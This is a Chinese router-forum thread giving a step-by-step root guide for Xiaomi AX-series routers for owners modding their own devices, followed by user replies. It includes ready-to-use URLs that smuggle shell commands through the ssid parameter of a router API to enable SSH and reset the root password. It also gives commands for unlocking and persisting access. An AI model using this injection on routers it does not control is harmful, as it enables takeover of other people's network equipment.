找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888
查看: 72823|回复: 134

[ax9000] 小米ax3600/ax6000/ax9000/ax5/ax6获取root权限【简单快速】【修复丢ssid】

 火... [复制链接]
发表于 2020-8-5 22:00 | 显示全部楼层 |阅读模式
本帖最后由 paldier 于 2021-8-24 08:41 编辑

更新工具检测是否是特殊版
修复固件读取不了ssid的问题
修复极个别机器crc错误
添加型号显示
更新armv7和armv8支持

首先固件版本需要降级到AX3600 1.0.17
固件下载地址
链接: https://pan.baidu.com/s/15QsNvM9qwgTVtk8zF843eA 提取码: 8rcu

升级后安装正常设置流程设置一遍,最后登录后地址是
  1. http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/web/home#router
复制代码

注意这个`<STOK>`就是接下来要使用的,大小写敏感,直接复制不要手敲

  1. http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B
复制代码

把`<STOK>`替换成你的,回车后显示`{"code":0}`就说明成功了,接下来为了升级算密码的麻烦直接改掉root密码

  1. http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B
复制代码

把`<STOK>`替换成你的,回车后显示`{"code":0}`就说明成功了,这样root的密码就是admin了
直接ssh登录就能见到are u ok
如果想改成其他密码
  1. passwd root
复制代码

接下来输入两次密码,然后重新登录就ok了
但这样并不能保证升级后ssh还能登录
下面继续

  1. nanddump -f /tmp/bdata_mtd9.img /dev/mtd9
复制代码

然后用winscp下载到桌面备份好(以防万一),接下来把网盘下载的mitool.zip解压出的3个文件上传到路由`/tmp`目录里
然后
  1. chmod +x /data/mitool*
复制代码

在然后
  1. /data/mitool.sh unlock
复制代码

机器会自动重启,重启后继续
  1. /data/mitool.sh hack
复制代码

会自动设置永久ssh、telnet、uart权限并自动重启,同时会计算出默认的root密码,注意记录密码,恢复出厂后telnet和ssh需要用
重启后即使恢复出厂ssid也能正常了

随时查看默认密码
  1. /data/mitool.sh password
复制代码




如升级后ssh被禁用可以用telnet登录,执行下面代码再次启用ssh

  1. sed -i 's/channel=.*/channel="debug"/g' /etc/init.d/dropbear
  2. /etc/init.d/dropbear start
复制代码

至此基本可以保证机器长期拥有root权限

源代码

https://github.com/paldier/ax3600_tool

点评

unlock以后应该执行 /data/mitool_arm64 hack 而不是/data/mitool.sh hack  发表于 2022-11-7 02:02
大佬 这三个,你三个命令chmod +x /data/mitool* /data/mitool.sh unlock /data/mitool.sh hack 不应该是tmp吗 怎么是data ? 文件都是上传到tmp文件了啊?  发表于 2021-9-6 14:09

评分

参与人数 9恩山币 +9 收起 理由
梦游Beef + 1 文件上传到/tmp,但是命令是data的
SkyTiger + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
平静的幸福 + 1 大佬 这三个,你三个命令chmod +x /data/mitool* /dat
dachandler7 + 1 厉害
fejich + 1 图片选的好,高手少不了!
z54_007 + 1 这个年轻人不讲武德,耗子尾汁!
dengliyuan99 + 1 楼主厉害!
浪子大春 + 1 感谢P大出手,期待第三方固件
Mr.Liang + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!

查看全部评分

我的恩山、我的无线 The best wifi forum is right here.
发表于 2020-8-5 23:26 来自手机 | 显示全部楼层
非常有用,感谢分享
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2020-8-6 00:28 | 显示全部楼层
感谢楼主分享~!
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2020-8-6 03:49 | 显示全部楼层
谢谢分享,有机会买台来试试
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2020-8-6 04:03 | 显示全部楼层
牛逼啊这个
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2020-8-6 08:41 | 显示全部楼层
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2020-8-6 11:10 | 显示全部楼层
跟那个帖子一样的。不过全自动了。

能计算root密码倒是很好。

不过既然ssh默认开不了,那就不要修改了吧。

uart是什么意思
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2020-8-6 11:36 | 显示全部楼层
ax5可以用就好了
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2020-8-6 14:57 | 显示全部楼层
恢复是将“bdata_mtd9.img”回刷进去就行吗?
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2020-8-6 17:45 来自手机 | 显示全部楼层
不知ax5能否通用
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2020-8-8 00:26 | 显示全部楼层
我的bdata是在mtd2分区,所以并不适用。。。
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2020-8-8 15:14 | 显示全部楼层
感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2020-8-8 18:01 | 显示全部楼层
.50版本能用么?已经升级到了50版本开了ssh
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2020-8-8 19:58 | 显示全部楼层
这样操作后 ssh 获取到了   wifi 凉了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×

点评

我也遇到此类问题  详情 回复 发表于 2022-3-17 15:22
老哥解决了吗,备份文件还有??给我一份  详情 回复 发表于 2020-8-10 18:34
这种情况下 再次恢复下出厂设置就可以了 如果想恢复原状 把前面备份的内容再上传到/tmp 执行下面命令 mtd write /tmp/bdata_mtd9.img bdata  详情 回复 发表于 2020-8-8 20:54
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2020-8-8 20:54 | 显示全部楼层
ligeek 发表于 2020-8-8 19:58
这样操作后 ssh 获取到了   wifi 凉了

这种情况下 再次恢复下出厂设置就可以了
如果想恢复原状
把前面备份的内容再上传到/tmp 执行下面命令
mtd write /tmp/bdata_mtd9.img bdata

点评

tzd
没有备份文件怎么恢复到没开启ssh之前  详情 回复 发表于 2021-8-15 22:16
请问下出现这样该如何解决呢 root@XiaoQiang:~# mtd write /tmp/bdata_mtd9.img bdata Could not open mtd device: bdata Can't open device for writing!  详情 回复 发表于 2021-2-15 20:15
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

有疑问请添加管理员QQ86788181|手机版|小黑屋|Archiver|恩山无线论坛(常州市恩山计算机开发有限公司版权所有) ( 苏ICP备05084872号 )

GMT+8, 2024-3-28 18:22

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

| 江苏省互联网有害信息举报中心 举报信箱:js12377 | @jischina.com.cn 举报电话:025-88802724 本站不良内容举报信箱:68610888@qq.com 举报电话:0519-86695797

快速回复 返回顶部 返回列表